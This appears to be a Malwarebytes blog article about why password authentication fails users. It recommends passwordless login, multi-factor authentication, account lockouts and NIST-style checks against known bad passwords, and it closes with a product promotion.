The first is that password authentication is a terrible design. Its success hinges on humans being good at something humans are really bad at: Creating and remembering long strings of random characters.

In an environment where users must now remember about 100 passwords each, it is impossible to use passwords well without assistance. The only chance you have of making it work is to outsource the “creating and remembering” part you’re really bad at to a computer, in the form of some password management software.

Password managers are great—apart from where they aren't, like when you're logging in to Windows—but from what we can tell, most people still don’t use password managers, and those that do are almost certainly the most security-aware among us; in other words, the folks who need its help the least.

And when I write “impossible” I am not being hyperbolic. You cannot remember 100, different, strong passwords. You just can’t. Almost all of us run into serious problems juggling fewer than ten. (If you’re still doubtful, read Why (almost) everything we told you about passwords was wrong, it’s got more details and links to the research.)

The second problem is that for too long we made passwords a problem for users to solve instead a problem for IT or security. Dispersing the responsibility like this created an enormous headache that has consumed untold resources. A system is only as strong as its worst password choice, but we almost never know what the worst choice is or who made it. That creates a situation where improving security rests on our ability to _improve every single user_ in the hope that we’ll reach the worst.

Attempts to level up users often boil down to edicts about how to do passwords better, such as making sure each password includes a mixture of uppercase and lowercase letters, and that passwords are not reused.

It’s like we asked the janitor to configure the firewall rules and then tried to fix our terrible mistake by having a firewall expert constantly lecture the janitor about not messing up the firewall.

Repeated password breaches over decades—which show us real users’ password choices—suggest that these edicts are having little effect. This shouldn’t be a surprise. Reusing passwords and making passwords simpler may be bad for security, but they make perfect sense if your most pressing problem is working out how to juggle an unmanageably large portfolios of passwords.

Our experiment in shifting responsibility and blame to users hasn’t worked. Ransomware gangs rely routinely on phished, stolen, or guessed passwords to break into corporate networks through VPNs or remote desktops, causing untold damage and disruption.

The good news is that while there isn’t much we can do about problem number one, number two was a choice, and it’s a choice we can un-make. There is another way, but it requires a shift in mindset.

Instead of thinking about how to get users to choose stronger passwords, businesses should focus on protecting themselves from users’ poor password choices instead.

The most powerful way to do this is to remove passwords entirely. Thankfully, after decades of false starts, a slew of technologies like Apple’s Touch ID, Windows Hello, and FIDO2 has appeared that now make this a viable option in a number of areas.

Passwords are going to be with us for a long time yet though, so we still need ways to cope with bad ones where passwordless authentication is unavailable.

Where you can’t abandon passwords, the next best option is multi-factor authentication (MFA). In 2019, Microsoft’s Alex Weinert wrote that “Based on our studies, your account is more than 99.9% less likely to be compromised if you use MFA.”

MFA comes in different flavors and your choice of flavor makes a difference: Hardware keys are better than push notifications from an app, which are better than One-Time Password (OTP) codes from an app, which are better than OTP codes over SMS. But the improvements that come in the steps between the different forms of MFA are incremental. The step between MFA of any kind and no MFA at all is transformational.

More than any other choice or technology, MFA puts the responsibility for password security back into the hands of IT and security specialists where it belongs.

There are other measures, too. When you go to an ATM you don’t have to type in a 14-character password with eight quattuordecillion (that's a number with 45 zeroes at the end of it) possible combinations to get your money—a 4-digit PIN with a paltry 10,000 possible combinations will do.

Why? Because the ATM isn’t going to give an attacker 10,000 chances to guess the correct PIN, it’s going to give them three, and then it’s going to eat the card. The same thing happens on your iPhone. Six wrong guesses and you’re on the naughty step. Ten wrong guesses and your data can self-destruct.

No normal user is going to make hundreds of guesses at their password before phoning support, so take a leaf out of your bank’s playbook and give your users a handful of chances to enter their password correctly.

Like MFA, account lockouts allow users to stay secure even with truly awful password choices. (After all, EVERY 4-digit PIN is a terrible password choice.)

In the interests of defense in depth, businesses may still want to ensure that users are making strong passwords, or at least avoiding weak ones. Here, the thinking has changed in the last decade, and that change is enshrined in the National Institute of Standards and Technology (NIST) Digital Identity Guidelines.

Forcing people to create passwords to a formula, insisting on at least one uppercase letter, at least one special character etc, is out. And so are periodic password resets. Both are far more effective at annoying users than they are at improving security.

Instead, NIST says, it’s more effective to simply stop users choosing known bad passwords, such as passwords that have appeared in breaches or that are based on dictionary words.

If you are going to insist on strong passwords, please make a password manager part of the standard software suite on all your organization’s machines, and make sure employees actually know how to use it. Many users simply don't trust password managers, and unless you've sat with somebody using one for the first time, you may not appreciate how difficult it can be for people to make sense of them.

The measures I’ve suggested in this article are not interchangeable or equally effective: You should start at the top and work down. If you do that, you can improve password security, remove the need for toothless edicts, and perhaps we can finally get rid of these annual pep talks.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Tag

#apple